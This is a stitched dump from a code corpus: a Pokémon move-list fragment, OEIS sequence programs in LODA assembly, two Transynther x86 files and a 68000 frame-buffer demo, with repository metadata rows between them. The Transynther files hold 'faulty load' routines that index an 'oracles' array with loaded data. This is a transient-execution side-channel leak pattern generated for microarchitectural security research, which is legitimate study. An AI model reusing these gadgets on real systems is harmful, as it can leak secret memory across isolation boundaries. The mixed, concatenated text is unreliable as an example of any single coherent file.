tmhm FOCUS_PUNCH, ROAR, TOXIC, BULK_UP, HIDDEN_POWER, SUNNY_DAY, HYPER_BEAM, PROTECT, FRUSTRATION, SOLARBEAM, EARTHQUAKE, RETURN, DIG, BRICK_BREAK, DOUBLE_TEAM, FLAMETHROWER, FIRE_BLAST, ROCK_TOMB, AERIAL_ACE, FACADE, SECRET_POWER, REST, ATTRACT, OVERHEAT, FOCUS_BLAST, FLING, ENDURE, WILL_O_WISP, SHADOW_CLAW, GIGA_IMPACT, STONE_EDGE, SWORDS_DANCE, CAPTIVATE, ROCK_SLIDE, SLEEP_TALK, NATURAL_GIFT, POISON_JAB, SWAGGER, SUBSTITUTE, CUT, STRENGTH, ROCK_SMASH, ROCK_CLIMB, BLAST_BURN, BOUNCE, FIRE_PUNCH, FURY_CUTTER, HEAT_WAVE, HELPING_HAND, KNOCK_OFF, LAST_RESORT, MUD_SLAP, SNORE, SUPERPOWER, SWIFT, THUNDERPUNCH, VACUUM_WAVE
; end
| 52.5 | 628 | 0.764762 |
16446bc8bcc10a2bc00d2abec1240b3fee3ee532 | 398 | asm | Assembly | programs/oeis/213/A213397.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/213/A213397.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/213/A213397.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A213397: Number of (w,x,y) with all terms in {0,...,n} and 2*w >= |x+y-z|.
; 1,5,18,43,83,144,229,341,486,667,887,1152,1465,1829,2250,2731,3275,3888,4573,5333,6174,7099,8111,9216,10417,11717,13122,14635,16259,18000,19861,21845,23958,26203,28583,31104,33769,36581,39546,42667,45947,49392,53005,56789,60750
add $0,1
pow $0,3
mov $1,2
add $1,$0
mul $1,2
lpb $0,1
mod $0,1
div $1,3
lpe
sub $1,1
| 28.428571 | 229 | 0.68593 |
3af4ea49c400ba70108cd867f161c01986c4c17a | 7,721 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2.log_21829_1612.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2.log_21829_1612.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2.log_21829_1612.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r13
push %r14
push %r8
push %r9
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WC_ht+0x11ac0, %r10
nop
nop
nop
and %r12, %r12
movb $0x61, (%r10)
nop
nop
nop
nop
nop
add %r13, %r13
lea addresses_A_ht+0x94f0, %r13
nop
nop
sub %r8, %r8
vmovups (%r13), %ymm6
vextracti128 $1, %ymm6, %xmm6
vpextrq $0, %xmm6, %rbx
nop
cmp $17887, %r10
lea addresses_WT_ht+0x12672, %r10
cmp %r9, %r9
mov $0x6162636465666768, %r8
movq %r8, %xmm5
and $0xffffffffffffffc0, %r10
movntdq %xmm5, (%r10)
nop
xor $45668, %r8
lea addresses_normal_ht+0xba70, %r13
nop
nop
nop
add %r14, %r14
movb $0x61, (%r13)
nop
xor %r10, %r10
lea addresses_normal_ht+0x19388, %r13
nop
nop
nop
add %r10, %r10
vmovups (%r13), %ymm1
vextracti128 $0, %ymm1, %xmm1
vpextrq $0, %xmm1, %r14
nop
nop
nop
cmp %r10, %r10
lea addresses_A_ht+0xd240, %r14
nop
nop
nop
nop
nop
and $24506, %r10
movl $0x61626364, (%r14)
nop
inc %r12
lea addresses_D_ht+0xedc0, %r14
nop
nop
add $1435, %r8
movw $0x6162, (%r14)
nop
nop
nop
cmp $52624, %r8
lea addresses_WT_ht+0x166f9, %r14
nop
xor $57732, %r12
movups (%r14), %xmm1
vpextrq $1, %xmm1, %r8
nop
dec %r8
lea addresses_D_ht+0x1ac0, %rbx
nop
nop
nop
nop
sub $24305, %r12
mov (%rbx), %r9w
nop
nop
nop
nop
nop
xor $48818, %r12
lea addresses_normal_ht+0xb248, %rsi
lea addresses_UC_ht+0x10ac0, %rdi
nop
nop
cmp $7569, %r12
mov $115, %rcx
rep movsb
nop
nop
sub %r10, %r10
lea addresses_UC_ht+0xc00, %r9
nop
nop
nop
nop
xor $35255, %r13
mov $0x6162636465666768, %rdi
movq %rdi, (%r9)
nop
xor $4329, %r13
lea addresses_normal_ht+0xdc98, %rsi
xor $31528, %r13
mov $0x6162636465666768, %rcx
movq %rcx, %xmm0
movups %xmm0, (%rsi)
nop
and %r9, %r9
lea addresses_UC_ht+0x92c0, %r8
nop
nop
nop
nop
dec %rbx
movups (%r8), %xmm5
vpextrq $1, %xmm5, %r13
sub $45684, %r8
lea addresses_D_ht+0xaa5e, %r12
nop
nop
nop
nop
nop
add %r8, %r8
mov (%r12), %rdi
nop
nop
dec %r10
lea addresses_WT_ht+0x1d7c0, %rsi
lea addresses_WT_ht+0x6ba6, %rdi
nop
nop
nop
and %r14, %r14
mov $58, %rcx
rep movsq
add %rsi, %rsi
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %r9
pop %r8
pop %r14
pop %r13
pop %r12
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r12
push %r8
push %rax
push %rbp
push %rcx
// Faulty Load
lea addresses_normal+0x18ac0, %rcx
cmp $34920, %r8
mov (%rcx), %r12d
lea oracles, %r10
and $0xff, %r12
shlq $12, %r12
mov (%r10,%r12,1), %r12
pop %rcx
pop %rbp
pop %rax
pop %r8
pop %r12
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_normal', 'size': 8, 'AVXalign': False, 'NT': True, 'congruent': 0, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_normal', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'size': 1, 'AVXalign': False, 'NT': True, 'congruent': 10, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 4, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'size': 16, 'AVXalign': False, 'NT': True, 'congruent': 1, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_normal_ht', 'size': 1, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_normal_ht', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 1, 'same': True}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'size': 4, 'AVXalign': False, 'NT': True, 'congruent': 7, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 8, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_WT_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_D_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 11, 'same': True}}
{'OP': 'REPM', 'src': {'type': 'addresses_normal_ht', 'congruent': 0, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 9, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_UC_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_normal_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_UC_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 10, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_D_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 1, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WT_ht', 'congruent': 8, 'same': False}, 'dst': {'type': 'addresses_WT_ht', 'congruent': 0, 'same': False}}
{'34': 21829}
34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34
*/
| 35.255708 | 2,999 | 0.655615 |
b5e856e5e7b09ed83a16005c6f0731d1cae72e66 | 5,563 | asm | Assembly | target/asm/flat12864test1.asm | chriscamacho/emu68k | 5fc9e79e42b2023277dfa49e7faa7898d0d8ed96 | [
"MIT"
] | 8 | 2020-08-29T21:17:23.000Z | 2021-12-28T19:35:59.000Z | target/asm/flat12864test1.asm | chriscamacho/emu68k | 5fc9e79e42b2023277dfa49e7faa7898d0d8ed96 | [
"MIT"
] | null | null | null | target/asm/flat12864test1.asm | chriscamacho/emu68k | 5fc9e79e42b2023277dfa49e7faa7898d0d8ed96 | [
"MIT"
] | 1 | 2021-11-02T20:46:48.000Z | 2021-11-02T20:46:48.000Z | dc.l end+1024 ; start up SP
dc.l start ; start up PC
; demonstrates the 128x64 frame buffer display and the VBL plugin
; this got a bit out of hand and some sections of code rely
; on certain registers not getting changed... not terribly good practice!
rorg $400
frame:
dc.l 0
ypos:
dc.w 2 ; y pos of small text
start:
move.l #$A0000,A0 ; address of 128x64x1 output in A0
move.l #font8x8,A1 ; font data in A1
moveq.l #2,D0 ; x-coord D0 (in chars)
moveq.l #24,D1 ; y-coord D1 (in lines)
lsl.w #4,D1 ; y*16
add.w D1,D0 ; screen offset in D0
move.l #message,A2 ; start of message in A2
print8x:
moveq #0,D1
move.b (A2)+,D1 ; D1 next char to print
cmp.b #0,D1 ; is it a zero character
beq.s donePrint8x ; if so message complete!
sub.b #32,D1 ; char data starts at ascii 32
lsl.w #3,D1 ; 8 lines per char
move.b 0(A1,D1.w),0(A0,D0.w)
move.b 1(A1,D1.w),16(A0,D0.w)
move.b 2(A1,D1.w),32(A0,D0.w)
move.b 3(A1,D1.w),48(A0,D0.w)
move.b 4(A1,D1.w),64(A0,D0.w)
move.b 5(A1,D1.w),80(A0,D0.w)
move.b 6(A1,D1.w),96(A0,D0.w)
move.b 7(A1,D1.w),112(A0,D0.w) ; neat
add.l #1,D0
bra.s print8x
donePrint8x:
move.l #font4x8,A1
moveq #8,D0 ; D0 x-coord in chars
moveq #0,d3
move.b D0,d3
andi.b #1,d3 ; d3 is shift flag
lsr #3,D0 ; D0 /8 offset
move.w (ypos),D1 ; get the ypos
addi.w #1,D1 ; add 1
cmp.w #23,D1 ; if >56
ble yok
moveq.w #0,D1 ; reset to 0
yok:
move.w D1,ypos ; save ypos
lsl.w #5,D1
add.w D1,D0 ; screen offset in D0
move.l #message2,A2 ; start of message in A2
print4:
moveq #0,D1
move.b (A2)+,D1 ; D1 next char to print
cmp.b #0,D1 ; is it a zero character
beq donePrint4 ; if so message complete!
sub.b #32,D1 ; char data starts at ascii 32
lsl.w #3,D1 ; 8 lines per char
moveq #0,D2
move.b (A2)+,D2 ; 2nd char of pair
cmp.b #0,D2
bne.s print42ok
move.b #32,D2 ; D2 is second char in pain
print42ok:
sub.b #32,D2 ; char data starts at ascii 32
lsl.w #3,D2 ; 8 lines per char
move.b 0(A1,D1.w),D3 ; left of pair
move.b 0(A1,D2.w),D4 ; right of pair
lsl.b #4,D3
or.b D3,D4
or.b d4,0(A0,D0.w)
move.b 1(A1,D1.w),D3 ; left of pair
move.b 1(A1,D2.w),D4 ; right of pair
lsl.b #4,D3
or.b D3,D4
or.b d4,16(A0,D0.w)
move.b 2(A1,D1.w),D3 ; left of pair
move.b 2(A1,D2.w),D4 ; right of pair
lsl.b #4,D3
or.b D3,D4
or.b d4,32(A0,D0.w)
move.b 3(A1,D1.w),D3 ; left of pair
move.b 3(A1,D2.w),D4 ; right of pair
lsl.b #4,D3
or.b D3,D4
or.b d4,48(A0,D0.w)
move.b 4(A1,D1.w),D3 ; left of pair
move.b 4(A1,D2.w),D4 ; right of pair
lsl.b #4,D3
or.b D3,D4
or.b D4,64(A0,D0.w)
move.b 5(A1,D1.w),D3 ; left of pair
move.b 5(A1,D2.w),D4 ; right of pair
lsl.b #4,D3
or.b D3,D4
or.b D4,80(A0,D0.w)
move.b 6(A1,D1.w),D3 ; left of pair
move.b 6(A1,D2.w),D4 ; right of pair
lsl.b #4,D3
or.b D3,D4
or.b D4,96(A0,D0.w)
move.b 7(A1,D1.w),D3 ; left of pair
move.b 7(A1,D2.w),D4 ; right of pair
lsl.b #4,D3
or.b D3,D4
or.b D4,112(A0,D0.w)
add.l #1,D0 ; destination offset
bra.w print4
donePrint4:
moveq #3,d7
; wait for the VBL plugin to change
; this is like waiting for a vertical blank...
wl:
move.b ($B0000),D5
waitforit:
move.b ($B0000),D6
cmp.b D5,D6
beq waitforit
dbra d7,wl
; clear the frame buffer
cls:
move.w #$400,D7
clsloop: ; TODO !
move.b #0,(A0)+ ; reset at top of loop
dbra D7,clsloop
; frame++
move.l (frame),D7
addq.l #4,D7
move.l D7,(frame)
; put the frame value into the ascii message
moveq.l #7,D5
move.l #insert+8,A3 ; least significant nibble
fl:
move.l D7,D6
and.l #$f,D6 ; isolate next nibble
cmp #10,D6 ; 0-9 is okay
blt putAok
add.b #7+32,D6 ; to get to a-f
putAok:
add.b #48,D6 ; make ascii
move.b D6,-(A3) ; insert into message
lsr.l #4,D7 ; next nibble
dbra D5,fl
bra.w start ; main loop
rts
message:
dc.b "Hello World!",0
message2:
dc.b "Frame Number: "
insert:
dc.b "--------",0
EVEN ; in case strings are odd length!
; TODO incbin !
; path from the point of view of the makefile above...
include "./target/asm/fonts.inc"
end: ; for stack location calculation
| 26.874396 | 73 | 0.465576 |
e93e7d2be66621e44922732608d461c60e977438 | 1,174 | asm | Assembly | programs/oeis/277/A277722.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/277/A277722.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | null | null | null | programs/oeis/277/A277722.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | null | null | null | ; A277722: a(n) = floor(n*tau^2) where tau is the tribonacci constant (A058265).
; 0,3,6,10,13,16,20,23,27,30,33,37,40,43,47,50,54,57,60,64,67,71,74,77,81,84,87,91,94,98,101,104,108,111,115,118,121,125,128,131,135,138,142,145,148,152,155,158,162,165,169,172,175,179,182,186,189,192,196,199,202,206,209,213,216,219,223,226,230,233,236,240,243,246,250,253,257,260,263,267,270,274,277,280,284,287,290,294,297,301,304,307,311,314,317,321,324,328,331,334,338,341,345,348,351,355,358,361,365,368,372,375,378,382,385,389,392,395,399,402,405,409,412,416,419,422,426,429,433,436,439,443,446,449,453,456,460,463,466,470,473,476,480,483,487,490,493,497,500,504,507,510,514,517,520,524,527,531,534,537,541,544,548,551,554,558,561,564,568,571,575,578,581,585,588,592,595,598,602,605,608,612,615,619,622,625,629,632,635,639,642,646,649,652,656,659,663,666,669,673,676,679,683,686,690,693,696,700,703,707,710,713,717,720,723,727,730,734,737,740,744,747,751,754,757,761,764,767,771,774,778,781,784,788,791,794,798,801,805,808,811,815,818,822,825,828,832,835,838,842
mov $2,$0
mul $0,36
sub $0,3
mov $1,1
lpb $0
add $0,$1
div $0,2
mul $1,$0
lpe
div $1,47
mov $3,$2
mul $3,3
add $1,$3
| 69.058824 | 968 | 0.713799 |
87eb70807d4bf9b111529b374bde5e4961bee0ce | 8,408 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_687.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_687.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_687.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r9
push %rax
push %rbx
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x1e10, %rdx
nop
nop
nop
cmp %rax, %rax
and $0xffffffffffffffc0, %rdx
vmovntdqa (%rdx), %ymm4
vextracti128 $1, %ymm4, %xmm4
vpextrq $0, %xmm4, %rbx
nop
nop
nop
and $24822, %r9
lea addresses_WC_ht+0xc588, %rsi
lea addresses_UC_ht+0x1ebd0, %rdi
nop
mfence
mov $2, %rcx
rep movsl
nop
nop
nop
nop
sub $30320, %rax
lea addresses_D_ht+0xf9d0, %rsi
lea addresses_WC_ht+0xed4, %rdi
nop
nop
cmp %r9, %r9
mov $81, %rcx
rep movsw
nop
nop
nop
nop
xor $56129, %rdx
lea addresses_WT_ht+0x13620, %rsi
lea addresses_WC_ht+0x14c82, %rdi
cmp $2329, %rdx
mov $5, %rcx
rep movsw
nop
nop
nop
xor $54402, %rbx
lea addresses_WT_ht+0x112d0, %rsi
lea addresses_A_ht+0x1dd0, %rdi
nop
nop
nop
add %r9, %r9
mov $37, %rcx
rep movsq
nop
nop
nop
nop
add %rdx, %rdx
lea addresses_WC_ht+0x6ad0, %rsi
lea addresses_A_ht+0x8ad0, %rdi
clflush (%rsi)
nop
nop
and $36635, %r9
mov $98, %rcx
rep movsb
nop
nop
nop
nop
cmp %rcx, %rcx
lea addresses_D_ht+0x10720, %rsi
lea addresses_WC_ht+0x13a9a, %rdi
nop
nop
nop
nop
nop
inc %rdx
mov $78, %rcx
rep movsq
nop
nop
nop
nop
and $34460, %rax
lea addresses_A_ht+0x160f6, %rax
nop
nop
nop
dec %r11
movb (%rax), %r9b
nop
nop
nop
nop
cmp %rdi, %rdi
lea addresses_A_ht+0x19d0, %rdx
nop
nop
nop
nop
cmp %r11, %r11
mov $0x6162636465666768, %rdi
movq %rdi, %xmm6
movups %xmm6, (%rdx)
nop
nop
nop
nop
inc %rdi
lea addresses_UC_ht+0x1b9d0, %rsi
lea addresses_UC_ht+0x159d0, %rdi
clflush (%rsi)
nop
nop
and %r11, %r11
mov $41, %rcx
rep movsl
nop
add $26560, %rdx
lea addresses_WC_ht+0x2fd0, %rdi
sub $52193, %r11
movups (%rdi), %xmm0
vpextrq $0, %xmm0, %rcx
nop
nop
xor $64934, %r11
lea addresses_WT_ht+0x89d0, %rsi
lea addresses_WC_ht+0x11d0, %rdi
nop
nop
nop
nop
and %rdx, %rdx
mov $97, %rcx
rep movsw
nop
nop
nop
xor $6620, %rdi
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbx
pop %rax
pop %r9
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r12
push %r13
push %r9
push %rax
push %rbx
push %rcx
push %rdi
push %rsi
// Load
lea addresses_UC+0x1d3e0, %r11
nop
nop
nop
and %r12, %r12
mov (%r11), %rax
nop
nop
nop
cmp %r13, %r13
// REPMOV
lea addresses_A+0xc1d0, %rsi
lea addresses_WT+0x51d0, %rdi
add $46003, %rax
mov $68, %rcx
rep movsb
xor %rsi, %rsi
// REPMOV
lea addresses_PSE+0x4850, %rsi
lea addresses_D+0x7950, %rdi
nop
nop
nop
nop
add %rax, %rax
mov $42, %rcx
rep movsl
add %r13, %r13
// Store
lea addresses_PSE+0x18130, %r9
add %rbx, %rbx
mov $0x5152535455565758, %r11
movq %r11, %xmm6
movups %xmm6, (%r9)
nop
nop
and $7765, %rax
// Faulty Load
lea addresses_A+0xc1d0, %rsi
nop
add %r13, %r13
movups (%rsi), %xmm1
vpextrq $0, %xmm1, %rax
lea oracles, %rdi
and $0xff, %rax
shlq $12, %rax
mov (%rdi,%rax,1), %rax
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %rax
pop %r9
pop %r13
pop %r12
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_A', 'same': False, 'size': 2, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_UC', 'same': False, 'size': 8, 'congruent': 4, 'NT': True, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_A', 'congruent': 0, 'same': True}, 'dst': {'type': 'addresses_WT', 'congruent': 9, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_PSE', 'congruent': 6, 'same': False}, 'dst': {'type': 'addresses_D', 'congruent': 7, 'same': False}, 'OP': 'REPM'}
{'dst': {'type': 'addresses_PSE', 'same': False, 'size': 16, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
[Faulty Load]
{'src': {'type': 'addresses_A', 'same': True, 'size': 16, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'type': 'addresses_A_ht', 'same': False, 'size': 32, 'congruent': 4, 'NT': True, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_WC_ht', 'congruent': 2, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_D_ht', 'congruent': 10, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 2, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_WT_ht', 'congruent': 3, 'same': True}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 0, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_WT_ht', 'congruent': 8, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 10, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_WC_ht', 'congruent': 8, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 6, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_D_ht', 'congruent': 4, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 0, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_A_ht', 'same': False, 'size': 1, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_A_ht', 'same': False, 'size': 16, 'congruent': 10, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_UC_ht', 'congruent': 11, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 9, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_WC_ht', 'same': False, 'size': 16, 'congruent': 9, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_WT_ht', 'congruent': 11, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 11, 'same': False}, 'OP': 'REPM'}
{'35': 21829}
35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 